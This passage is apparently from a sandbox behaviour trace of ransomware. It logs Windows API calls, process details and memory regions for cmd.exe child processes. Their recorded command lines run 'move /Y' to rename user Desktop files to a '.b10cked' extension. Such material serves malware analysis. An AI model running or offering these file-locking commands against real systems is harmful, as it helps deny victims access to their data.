[0220.892] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.892] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0x3dfff8 [0220.892] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.893] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef42c | out: 
lpFindFileData=0x2ef42c) returned 0x3dfff8 [0220.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.893] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.893] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.893] GetEnvironmentStringsW () returned 0x3e2ad8* [0220.893] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0220.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.894] GetConsoleOutputCP () returned 0x1b5 [0220.894] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.894] GetUserDefaultLCID () returned 0x409 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="0") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="0") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="1") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, 
cchData=32 | out: lpLCData="Thu") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.896] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.897] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.898] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.899] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.899] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.899] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.899] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.899] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.899] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.902] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.984] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="ERASE") returned 8 
[0222.984] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0222.984] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CD") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="REN") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="SET") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0222.984] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="MD") returned 11 [0222.984] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0222.984] _wcsicmp (_String1="move", _String2="RD") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0222.984] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="VER") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0222.985] _wcsicmp (_String1="move", _String2="START") 
returned -6 [0222.985] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0222.985] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0222.985] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0222.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef2a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef29c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef29c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 
[0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0222.988] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0222.988] _wcsicmp (_String1="CKLVAY~1.FLV", _String2=".") returned 53 [0222.988] _wcsicmp (_String1="CKLVAY~1.FLV", _String2="..") returned 53 [0222.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\cklvay~1.flv")) returned 
0x20 [0222.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0222.989] SetErrorMode (uMode=0x0) returned 0x0 [0222.989] SetErrorMode (uMode=0x1) returned 0x0 [0222.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", nBufferLength=0x104, lpBuffer=0x2eec2c, lpFilePart=0x2eec14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", lpFilePart=0x2eec14*="CKLVAY~1.FLV") returned 0x25 [0222.989] SetErrorMode (uMode=0x0) returned 0x1 [0222.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0222.989] _wcsicmp (_String1="CKLVAY~1.FLV", _String2=".") returned 53 [0222.989] _wcsicmp (_String1="CKLVAY~1.FLV", _String2="..") returned 53 [0222.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\cklvay~1.flv")) returned 0x20 [0222.989] SetErrorMode (uMode=0x0) returned 0x0 [0222.989] SetErrorMode (uMode=0x1) returned 0x0 [0222.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", nBufferLength=0x104, lpBuffer=0x2ef0a8, lpFilePart=0x2eee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", lpFilePart=0x2eee40*="CKLVAY~1.FLV") returned 0x25 [0222.989] SetErrorMode (uMode=0x0) returned 0x1 [0222.990] SetErrorMode (uMode=0x0) returned 0x0 [0222.990] SetErrorMode (uMode=0x1) returned 0x0 [0222.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", nBufferLength=0x104, lpBuffer=0x2ef2b0, lpFilePart=0x2eee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", lpFilePart=0x2eee40*="CKLvAyoW1loaz.flv.b10cked") returned 0x32 [0222.990] SetErrorMode (uMode=0x0) returned 0x1 [0222.990] SetLastError (dwErrCode=0x0) [0222.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked" (normalized: 
"c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv.b10cked")) returned 0xffffffff [0222.990] GetLastError () returned 0x2 [0222.990] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x2ee7bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee7bc) returned 0x3d0f08 [0222.990] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x2ee7bc | out: lpFindFileData=0x2ee7bc) returned 0 [0222.991] GetLastError () returned 0x12 [0222.991] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0222.992] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0222.992] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", nBufferLength=0x104, lpBuffer=0x2eea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", lpFilePart=0x0) returned 0x32 [0222.992] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", nBufferLength=0x104, lpBuffer=0x2eea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", lpFilePart=0x0) returned 0x2a [0222.992] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv")) returned 0x20 [0222.992] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv.b10cked"), dwFlags=0x3) returned 1 [0222.993] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0222.993] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, 
_Format="%9d", _ArgList=0x2eea08 | out: _Buffer=" 1") returned 9 [0222.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.993] GetFileType (hFile=0x7) returned 0x2 [0222.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee994 | out: lpMode=0x2ee994) returned 1 [0222.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.993] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ee9c8 | out: lpConsoleScreenBufferInfo=0x2ee9c8) returned 1 [0222.994] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.994] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2eea08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.994] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ee9ec, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2ee9ec*=0x1a) returned 1 [0222.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.995] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.995] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.995] SetConsoleInputExeNameW () returned 0x1 [0222.995] GetConsoleOutputCP () returned 0x1b5 [0222.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.995] exit (_Code=0) Process: id = "577" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" 
page_root = "0x7ea16640" os_pid = "0xf44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32934 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32935 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32936 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32937 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32938 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32939 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32940 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32941 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32942 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32943 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33152 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33153 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33154 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33155 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 33156 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33157 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33158 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33159 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33160 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33161 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33162 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33163 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33164 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33165 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33166 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 33167 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33168 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33169 
start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33170 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33171 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33172 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33173 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 33174 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 33175 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 781 os_tid = 0xc98 [0220.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f81c | out: lpSystemTimeAsFileTime=0x24f81c*(dwLowDateTime=0xb85abcc0, dwHighDateTime=0x1d440a9)) [0220.713] GetCurrentProcessId () returned 0xf44 [0220.713] GetCurrentThreadId () returned 0xc98 [0220.713] GetTickCount () returned 0x3d96d [0220.713] QueryPerformanceCounter (in: lpPerformanceCount=0x24f814 | out: lpPerformanceCount=0x24f814*=27750212348) returned 1 [0220.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.713] __set_app_type (_Type=0x1) [0220.713] __p__fmode () returned 0x76b331f4 [0220.714] __p__commode () returned 0x76b331fc [0220.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.714] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 
[0220.714] GetCurrentThreadId () returned 0xc98 [0220.714] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0220.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.714] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7ac | out: phkResult=0x24f7ac*=0x0) returned 0x2 [0220.714] VirtualQuery (in: lpAddress=0x24f7e3, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.714] 
